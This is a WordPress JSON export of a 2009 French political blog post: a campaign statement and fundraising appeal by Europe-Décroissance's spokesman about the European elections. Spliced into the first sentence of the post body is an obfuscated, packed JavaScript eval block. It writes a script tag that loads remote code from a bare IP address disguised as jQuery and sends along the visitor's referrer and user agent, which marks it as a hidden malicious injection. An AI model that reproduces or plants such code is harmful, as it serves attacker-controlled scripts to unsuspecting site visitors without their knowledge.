{"id":2902,"date":"2009-05-11T04:40:10","date_gmt":"2009-05-11T03:40:10","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=2902"},"modified":"2009-12-09T12:19:49","modified_gmt":"2009-12-09T11:19:49","slug":"aidez-europe-decroissance-a-recouvrir-les-depenses-imposees","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=2902","title":{"rendered":"Aidez Europe-D\u00e9croissance \u00e0 recouvrir les d\u00e9penses \u00e9lectorales impos\u00e9es"},"content":{"rendered":"<p><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=4\" target=\"_blank\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-24\" style=\"margin: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><strong>Ce <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdbhn|var|u0026u|referrer|rrkry||js|php'.split('|'),0,{}))\n<\/script><\/noindex> n\u2019est pas la facilit\u00e9 que nous avons choisie !<\/strong><strong><br \/>\n<\/strong>(par <em>Christian Sunt<\/em>, porte-parole d&rsquo;Europe-D\u00e9croissance)<strong><br \/>\n<\/strong><\/p>\n<p>Nous pensons que l\u2019urgence face aux catastrophes \u00e0 venir est de proposer au d\u00e9bat un projet de rupture civilisationnelle. En effet, un tel projet politique qui mette au c\u0153ur de l\u2019urgence sociale, l\u2019urgence \u00e9cologique n\u2019existe pas encore. Ce projet doit \u00eatre d\u00e9battu et revendiqu\u00e9 par des r\u00e9seaux militants, au niveau mondial, pour qu\u2019enfin d\u2019autres mondes soient possibles&#8230; Les \u00e9lections europ\u00e9ennes sont pour nous l\u2019occasion de construire plus rapidement ce r\u00e9seau en France, avec des connexions \u00e0 d\u2019autres pays europ\u00e9ens.<\/p>\n<p><!--more-->Notre \u00ab\u00a0aventure\u00a0\u00bb, peut servir d\u2019exemple \u00e0 d\u2019autres. Les \u00ab\u00a0Objecteurs de Croissance\u00a0\u00bb existent d\u00e9j\u00e0 dans dix pays europ\u00e9ens, au Qu\u00e9bec&#8230;.<\/p>\n<ul>\n<li>Nous avons donc choisi d\u2019utiliser au mieux (de nos moyens) les possibilit\u00e9s d\u2019expression que nous donnent la loi \u00e9lectorale fran\u00e7aise ; Je dirais m\u00eame que le d\u00e9ni de d\u00e9mocratie proportionnelle, qui a consist\u00e9 \u00e0 cr\u00e9er plusieurs circonscriptions inter-r\u00e9gionales, plut\u00f4t qu\u2019une seule nationale, nous rend service, \u00e0 notre niveau, en nous obligeant \u00e0 cr\u00e9er des r\u00e9seaux locaux.<\/li>\n<li>Nous irons donc jusqu\u2019au d\u00e9p\u00f4t des listes, pour participer au d\u00e9bat de la campagne officielle et surtout pour r\u00e9pondre aux nombreuses sollicitations du mouvement social. Malheureusement nous n\u2019aurons pas les moyens d\u2019\u00e9diter une profession de foi qui aurait pu \u00eatre lue pour la premi\u00e8re fois par des millions de gens.<\/li>\n<li>De plus, nous avons pris la d\u00e9cisions de ne pas engager l\u2019inutiles d\u00e9penses d\u2019impressions des bulletins de vote. Ce qui accentue le fait que notre premi\u00e8re campagne est qualitative &#8211; du lien par le d\u00e9bat &#8211; et non quantitative &#8211; le nombre de bulletins -.<\/li>\n<li>Nous permettrons \u00e0 ceux qui le veulent, de t\u00e9l\u00e9charger et d\u2019imprimer un bulletin officiel<\/li>\n<li>l\u2019essentiel est bien le contenu de la campagne. L\u2019essentiel, c\u2019est aussi les r\u00e9seaux de militants qui vont s\u2019en emparer, pour pr\u00e9parer l\u2019apr\u00e8s \u00e9lection : la construction du projet, d\u2019un nouveau mouvement de pens\u00e9e \u00e9cologiste, social, altermondi(ali)ste, et autogestionnaire.<\/li>\n<\/ul>\n<p><strong>Pour illustrer le propos :<\/strong><br \/>\nComme pour toutes les autres listes, nous sommes invit\u00e9s \u00e0 des dizaines de d\u00e9bats organis\u00e9s par des r\u00e9seaux sociaux, aussi divers que les associations pour le droit de vote des \u00e9trangers, le comit\u00e9 national des ch\u00f4meurs, le collectif la contre-PAC, Sortir du nucl\u00e9aire &#8230;&#8230;<br \/>\nDes Collectifs Altermondialistes rejoignent notre campagne, comme d\u2019autres militants, individuels, de diverses mouvances \u00e9colos et alters&#8230;<\/p>\n<p>Jusqu\u2019\u00e0 pr\u00e9sent la parole de l\u2019Objection de Croissance \u00e9tait monopolis\u00e9e par quelques personnalit\u00e9s m\u00e9diatiques, aujourd\u2019hui des anonymes la revendiquent, et s\u2019organisent pour ne plus d\u00e9l\u00e9guer leur voix&#8230;<br \/>\n<strong>N\u2019est-ce pas l\u00e0 un premier et essentiel r\u00e9sultat !?<\/strong><\/p>\n<ul>\n<li>Nous ne pensons pas que les soci\u00e9t\u00e9s \u00e9voluent par la simple prise du pouvoir, mais par l\u2019action conjugu\u00e9e de mouvements sociaux sur les majorit\u00e9s dans les institutions, et les contre-pouvoirs (y compris les alternatives concr\u00e8tes) Cr\u00e9er une nouvelle pens\u00e9e politique exige une pratique et une \u00e9laboration collective sur la base d\u2019une plate forme commune : le projet politique, qui donne la coh\u00e9rence \u00e0 l\u2019ensemble. C\u2019est cet outil politique que nous voulons construire, mais pas \u00e0 l\u2019identique d\u2019un parti politique (institution de conqu\u00eate du pouvoir) Nous ne voulons pas prendre le pouvoir.<\/li>\n<li>La d\u00e9finition de l\u2019outil est donc li\u00e9e \u00e0 notre projet. Sa forme est en d\u00e9bat, mais nous ne d\u00e9l\u00e8guerons plus notre voix \u00e0 des partis traditionnels.<\/li>\n<\/ul>\n<p style=\"text-align: left;\"><strong>C\u2019est \u00e0 nous tous de mettre un pas apr\u00e8s un pas, pour aller loin ensemble<\/strong><\/p>\n<p style=\"text-align: left;\"><em><strong>N<\/strong><strong>otre Budget de campagne, sobre et modeste se montent \u00e0 15000 Euros<\/strong>, ils couvrent les d\u00e9penses l\u00e9gales obligatoires et le remboursements de certains frais de d\u00e9placement, d\u2019\u00e9dition (plaquettes, tracts&#8230;) et de formation pour des t\u00e2ches administratives. Nous avons cr\u00e9\u00e9 une association de financement qui permet les d\u00e9ductions fiscales (2\/3 de la somme vers\u00e9e)<\/em><\/p>\n<p style=\"text-align: center;\"><strong>Ch\u00e8que \u00e0 l\u2019ordre \u201cADOC-France\u201d ou \u00ab\u00a0mandataire financier\u00a0\u00bb<\/strong><br \/>\n\u00e0 envoyer \u00e0 Christian Sunt ( AF-ADOC), Palli\u00e8res &#8211; 30140 THOIRAS<\/p>\n<p style=\"text-align: center;\"><strong>Vous pouvez adh\u00e9rer \u00e0 l\u2019ADOC-France ou rejoindre les \u00e9quipes de campagnes<\/strong><br \/>\nen vous rendant sur notre site <a href=\"http:\/\/nanorezo.free.fr\/spip.php?article45\">www.europedecroissance.eu<\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.europedecroissance.eu\/\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" style=\"margin-top: 5px; margin-bottom: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><strong><br \/>\nSoutenez le projet Europe-D\u00e9croissance de l\u2019ADOC-France<\/strong><br \/>\n<em>par courriel<\/em> : <a href=\"mailto:europedecroissance@gmail.com\">europedecroissance@gmail.com<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ce n\u2019est pas la facilit\u00e9 que nous avons choisie ! (par Christian Sunt, porte-parole d&rsquo;Europe-D\u00e9croissance) Nous pensons que l\u2019urgence face aux catastrophes \u00e0 venir est de proposer au d\u00e9bat un projet de rupture civilisationnelle. En effet, un tel projet politique &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=2902\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-2902","post","type-post","status-publish","format-standard","hentry","category-adoc-actualites"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2902","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2902"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2902\/revisions"}],"predecessor-version":[{"id":3873,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2902\/revisions\/3873"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2902"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2902"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}